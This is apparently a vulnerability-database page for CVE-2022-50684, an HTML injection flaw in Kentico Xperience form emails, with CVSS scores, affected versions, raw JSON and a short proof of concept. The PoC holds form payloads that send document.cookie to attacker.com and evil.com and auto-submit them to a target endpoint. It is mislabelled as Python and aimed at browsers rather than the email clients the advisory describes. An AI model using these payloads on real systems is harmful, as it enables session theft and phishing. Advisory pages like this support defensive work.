Security Vulnerability Report
中文
CVE-2022-50684 CVSS 6.1 MEDIUM

CVE-2022-50684

Published: 2025-12-18 20:15:51
Last Modified: 2025-12-27 17:15:41
Source: [email protected]

Description

An HTML injection vulnerability in Kentico Xperience allows attackers to inject malicious HTML values into form submission emails via unencoded form fields. Unencoded form values could enable HTML content execution in recipient email clients, potentially compromising email security.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:kentico:xperience:*:*:*:*:*:*:*:* - VULNERABLE
Kentico Xperience < 13.0.200
Kentico Xperience < 12.0.180

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2022-50684 HTML Injection PoC --> <!-- Attacker injects malicious HTML into Kentico Xperience form fields --> <!-- Malicious HTML Payload for form submission --> <html> <body> <h2>Kentico Xperience Form HTML Injection PoC</h2> <form action="https://target-site.com/api/form-submit" method="POST"> <!-- Inject malicious HTML in form fields --> <input type="text" name="firstName" value='<img src=x onerror="fetch(\'https://attacker.com/steal?c=\'+document.cookie)">'> <input type="text" name="email" value="[email protected]"> <input type="text" name="message" value='<script>document.location=\'https://evil.com/phish\'?data=\'+btoa(document.cookie)</script>'> <button type="submit">Submit</button> </form> <!-- Or use fetch/XHR to auto-submit --> <script> // Auto-submit the form with malicious payload const formData = new FormData(); formData.append('firstName', '<img src=x onerror=alert(document.domain)>'); formData.append('email', '[email protected]'); formData.append('message', '<iframe src="javascript:alert(document.cookie)">'); fetch('https://target-site.com/api/form-submit', { method: 'POST', body: formData }); </script> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2022-50684", "sourceIdentifier": "[email protected]", "published": "2025-12-18T20:15:50.593", "lastModified": "2025-12-27T17:15:41.040", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "An HTML injection vulnerability in Kentico Xperience allows attackers to inject malicious HTML values into form submission emails via unencoded form fields. Unencoded form values could enable HTML content execution in recipient email clients, potentially compromising email security."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:kentico:xperience:*:*:*:*:*:*:*:*", "versionEndIncluding": "13.0.71", "matchCriteriaId": "E22FA37E-D761-4A3B-9B8F-76038735F600"}]}]}], "references": [{"url": "https://devnet.kentico.com/download/hotfixes", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/kentico-xperience-form-emails-html-injection", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.